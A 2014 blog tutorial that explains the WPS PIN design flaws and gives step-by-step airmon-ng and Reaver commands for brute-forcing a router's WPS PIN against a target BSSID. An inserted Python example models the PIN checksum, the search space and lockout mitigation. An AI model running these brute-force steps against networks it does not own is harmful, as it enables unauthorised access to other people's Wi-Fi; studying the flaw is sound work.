Monday, 7 July 2014
Cracking WPA/WPA2 by Brute-Forcing Wi-Fi Protected Setup

For legal purposes, please don't try this on any equipment that you don't own.
Intro
Wi-Fi Protected Setup, more commonly known as WPS, is an optional configuration tool introduced in many Small Office and Home Office (SOHO) wireless routers starting in early 2007. This Wi-Fi Alliance certification program was designed to ease the task of SOHO wireless configuration by providing an industry-wide network setup solution. Nowadays most major vendors of SOHO-class Wi-Fi routers ship their products with WPS support, and it is activated by default.
Today we will be taking a look at 2 flaws in the WPS design that can be exploited in order to brute force the WPS PIN. I will give a brief overview of these 2 flaws, then follow up with instructions on how to work through exploiting WPS on a SOHO router using BackTrack 5 R3 and a tool called Reaver.
The Flaws
The flaws we will be looking at have to do with WPS's support for in-band configuration over IEEE 802.11/EAP, specifically the External Registrar process. This is the process a WLAN host uses to associate with a WAP by supplying the device's WPS PIN. The first flaw with this External Registrar option is that it does not require any authentication from the WLAN host before it may attempt to associate with the WAP, leaving the PIN vulnerable to brute-force attacks.
The second flaw has to do with the way the WPS authentication process is implemented over 802.11/EAP. This process uses a challenge-response methodology, and if at any point in the process you fail to correctly respond to the challenge, you receive an EAP-NACK message. The process also verifies the PIN in 2 parts, as shown below:

| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 0 |
|  1st half of PIN  | 2nd half  | Checksum |

Digits 1-4 are the first half of the PIN, digits 5-7 are the second half, and digit 8 is a checksum.
So by knowing at which step in the process we receive the EAP-NACK, we reduce the number of possibilities from 10^8 down to 10^4 + 10^4, or from 100,000,000 to 20,000. But since we know the 8th digit is a checksum of the PIN, we are really looking at 10^4 + 10^3, or 11,000, total testable combinations to solve for the complete WPS PIN. So with a tool like Reaver testing 4 PINs every 3 seconds, we can get through all possible combinations in approximately 4 hours.
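To make the arithmetic above concrete, here is an added example (not part of the original post) that models the WPS PIN structure: it implements the checksum rule from the WPS specification, counts the worst-case attempts under a split versus a whole-PIN check, and shows how an AP-side lockout after repeated failures, the usual vendor mitigation, stretches the attacker's wall-clock time. The sample PINs, attempt rate and lockout figures are constructed for illustration.

```python
# Added example (not from the original post): models the WPS PIN structure
# described above to quantify how much split verification and the checksum
# digit shrink an attacker's search space, and how an AP-side lockout (the
# usual mitigation) stretches it again. The checksum rule is the one in the
# WPS specification; sample PINs, rates and lockout figures are constructed.

WPS_WEIGHTS = (3, 1, 3, 1, 3, 1, 3)  # applied to the first seven digits

def wps_checksum(body: str) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN body."""
    if len(body) != 7 or not body.isdigit():
        raise ValueError("PIN body must be exactly 7 digits")
    accum = sum(w * int(d) for w, d in zip(WPS_WEIGHTS, body))
    return (10 - accum % 10) % 10

def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN (e.g. from a router label) passes the checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])

def worst_case_attempts(split_verification: bool, checksum_known: bool) -> int:
    """PIN attempts needed to exhaust the space under a given AP design.

    split_verification: the AP's EAP-NACK reveals whether the first four
    digits were right before the rest is checked (the flaw described above).
    checksum_known: PINs whose 8th digit is not the checksum are skipped.
    """
    if not split_verification:
        # Whole PIN judged at once: 10^8, or 10^7 valid-checksum candidates.
        return 10**7 if checksum_known else 10**8
    return 10**4 + (10**3 if checksum_known else 10**4)

def hours_to_exhaust(attempts: int, pins_per_second: float,
                     lockout_after: int = 0, lockout_seconds: float = 0.0) -> float:
    """Wall-clock hours to try `attempts` PINs against an AP that disables
    WPS for `lockout_seconds` after every `lockout_after` failures (0 = none)."""
    seconds = attempts / pins_per_second
    if lockout_after > 0:
        seconds += (attempts // lockout_after) * lockout_seconds
    return seconds / 3600

if __name__ == "__main__":
    print(is_valid_wps_pin("12345670"))  # the sample digits in the table above
    n = worst_case_attempts(split_verification=True, checksum_known=True)
    rate = 1.0  # constructed figure: one PIN attempt per second
    print(f"{n} PINs, no lockout: {hours_to_exhaust(n, rate):.1f} h")
    print(f"{n} PINs, 60 s lockout per 3 failures: "
          f"{hours_to_exhaust(n, rate, 3, 60):.1f} h")
```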
Using Reaver with Backtrack 5 R3
What you will need: a copy of BackTrack 5 and an external WLAN adapter (I use the Alfa Networks AWUS036H). You will also need to know the BSSID (MAC address) of the router you plan to attack; for this you can use something like airodump-ng to analyze all the APs in the area.

So let's get to the fun stuff.
1. Load up your BackTrack 5 instance.
2. Open up a terminal and run the following commands:
   a. CODE: sudo apt-get update
   b. CODE: sudo apt-get install reaver
3. Make sure your Wi-Fi adapter is connected and then place it into monitor mode:
   a. CODE: airmon-ng start wlan0
4. Next run the following command to invoke Reaver (-i selects the monitor interface, -b the target BSSID, -vv verbose output):
   a. CODE: reaver -i mon0 -b <BSSID of target> -vv

Note: you can use CTRL+C to pause and save the attack progress to continue at a later time.